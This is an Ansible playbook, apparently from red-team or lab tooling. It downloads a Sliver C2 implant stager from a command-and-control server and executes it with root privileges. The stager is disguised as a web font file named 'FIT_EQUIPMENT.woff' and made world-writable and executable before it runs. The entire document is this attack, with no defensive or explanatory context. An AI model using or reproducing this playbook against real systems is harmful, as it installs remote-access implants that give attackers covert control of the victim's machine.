---
- name: Download and execute sliver implant/stager
  hosts: localhost
  become: true
  vars:
    sliver_server_ip: "10.40.66.242" # SliverC2 IP
    sliver_server_port: 5555 # Sliver C2 server port
    sliver_linux_stager: "FIT_EQUIPMENT.woff"

  tasks:
    - name: Download sliver implant
      ansible.builtin.get_url:
        url: http://{{ sliver_server_ip }}:{{ sliver_server_port }}/{{ sliver_linux_stager }}
        dest: /home/opc/
        mode: 0777
      register: download_result
      retries: 3
      delay: 5

    - name: Execute stager
      ansible.builtin.shell: ./{{ sliver_linux_stager }}